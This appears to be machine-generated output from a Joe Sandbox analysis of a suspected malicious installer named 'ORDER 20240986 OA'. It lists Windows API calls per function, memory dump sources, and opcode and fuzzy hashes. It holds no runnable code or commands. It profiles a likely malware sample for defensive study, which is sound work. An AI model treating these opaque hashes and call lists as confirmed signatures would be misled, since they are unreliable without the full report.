                                                                                                                                                  • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$Enum
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 464197530-0
                                                                                                                                                  • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                                  • Instruction ID: 4ebe2cb43181949e29f1e9fb79ae388d5d3e17bd3db4e8cfc4c1202d027f6d8e
                                                                                                                                                  • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                                                                                                  • Instruction Fuzzy Hash: FB116A32500108FBDF02AB90CE49FEE7B7DAF44340F110076B905B51E1E7B59E21AB58
                                                                                                                                                  APIs
                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405811
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405825
                                                                                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405844
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3449924974-0
                                                                                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                  • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                                                                                  • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                                                                                                  APIs
                                                                                                                                                  • DestroyWindow.USER32(?,00000000,00403059,?,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00402EAA
                                                                                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                                                                                                  • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2102729457-0
                                                                                                                                                  • Opcode ID: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                  • Instruction ID: b514363a92e965461d88eaa206c20d0702a544c8e4880045d1c7c79aac8a479e
                                                                                                                                                  • Opcode Fuzzy Hash: 642f8ca692fd152fc603be3dcb1ebc0d266b07749ec13cb5d5f59d94c884d359
                                                                                                                                                  • Instruction Fuzzy Hash: 3AF05E30966A21EBC6606B24FE8CA8B7B64FB44B01711887BF001B11B4DA7C4892CBDC
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(?,?,?,?,004015D1,00000000,000000F0), ref: 00405C25
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C2A
                                                                                                                                                    • Part of subcall function 00405C17: CharNextW.USER32(00000000,?,?,?,004015D1,00000000,000000F0), ref: 00405C42
                                                                                                                                                  • lstrlenW.KERNEL32(007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CCD
                                                                                                                                                  • GetFileAttributesW.KERNEL32(007A4728,007A4728,007A4728,007A4728,007A4728,007A4728,00000000,007A4728,007A4728,?,?,?,004059C9,?), ref: 00405CDD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                  • String ID: (Gz
                                                                                                                                                  • API String ID: 3248276644-3338112938
                                                                                                                                                  • Opcode ID: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                                                                                                  • Instruction ID: 850bfc7ffc9f89e8bebb6f59b63454ed566b5c4d810398842941662e03732b0e
                                                                                                                                                  • Opcode Fuzzy Hash: a52dea6f46491884bfea8966144719ff55b77873c2b9e35538818f57ee0f9f4e
                                                                                                                                                  • Instruction Fuzzy Hash: 82F0D625019F5216F622363A4D09AAF1954CE82364B0A013FF891722C1DB3C8942DD6E
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindowVisible.USER32(?), ref: 004052A2
                                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                                                                                                    • Part of subcall function 0040425A: SendMessageW.USER32(?,?,00000000,00000000), ref: 0040426C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                                                  • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                  • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                                                                                                  • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                                                                                                  • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                                                                                                  APIs
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00405DDA
                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,007B3000,0040336A,007B5000,007B5800,007B5800,007B5800,007B5800,007B5800,74DF3420,004035B6), ref: 00405DF5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CountFileNameTempTick
                                                                                                                                                  • String ID: nsa
                                                                                                                                                  • API String ID: 1716503409-2209301699
                                                                                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                  • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                                                                                  • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: F$F$F$F
                                                                                                                                                  • API String ID: 0-1844600021
                                                                                                                                                  • Opcode ID: a418a8a2d60b5daab59206069136f10b4c948d20db7675d12285fd9d5129d6e7
                                                                                                                                                  • Instruction ID: 0af4cb1728fe13140e928818771fb49896f7dc93b36bbf3018a371618dcf236a
                                                                                                                                                  • Opcode Fuzzy Hash: a418a8a2d60b5daab59206069136f10b4c948d20db7675d12285fd9d5129d6e7
                                                                                                                                                  • Instruction Fuzzy Hash: B641B374A01249EFC706EFF8C4416AE7BB2EFCA304F1044A99410AB356DB756D49DB91
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Xhq$Xhq$Xhq$Xhq
                                                                                                                                                  • API String ID: 0-3565632849
                                                                                                                                                  • Opcode ID: 48699056c009618da2586f27935a239aeb414256237f67b6665e5381d926efb0
                                                                                                                                                  • Instruction ID: aa46c136d617331c0729c7c9549c5be4ba3a0d388a5c4327b55c806e624f32da
                                                                                                                                                  • Opcode Fuzzy Hash: 48699056c009618da2586f27935a239aeb414256237f67b6665e5381d926efb0
                                                                                                                                                  • Instruction Fuzzy Hash: CE31A972D00219CBDF758FA9899036FB7B6AB95301F144069C835AB380DB308E499B92
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945076810.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_150000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: \;dq$\;dq$\;dq$\;dq
                                                                                                                                                  • API String ID: 0-1855092343
                                                                                                                                                  • Opcode ID: d9d1b4c5ab7b78ddf7a445879b690a1424b02e397e91a2140b1b9ef900d7c022
                                                                                                                                                  • Instruction ID: 745c44b999bcdf071927d65e77de7ea0b787f5117ce90fb6c7e6c78155fdb19e
                                                                                                                                                  • Opcode Fuzzy Hash: d9d1b4c5ab7b78ddf7a445879b690a1424b02e397e91a2140b1b9ef900d7c022
                                                                                                                                                  • Instruction Fuzzy Hash: F701BC31700115CFCB248E2CC440A2673E6BF987AA766406AEC25CF3A0DF31DC8597C1
                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D1A
                                                                                                                                                  • CharNextA.USER32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D2B
                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000004.00000002.2945221064.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000004.00000002.2945200507.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945241945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945259440.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000004.00000002.2945380974.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 190613189-0
                                                                                                                                                  • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                  • Instruction ID: 076f441daad098c1e87a0755c7bbd60db18a276d6ce73f7d9d897af98e652dc6
                                                                                                                                                  • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                                                                                  • Instruction Fuzzy Hash: E5F0F631204918FFC7129FA4DD0499FBBB8EF06354B2580BAE840FB211D674DE01AFA8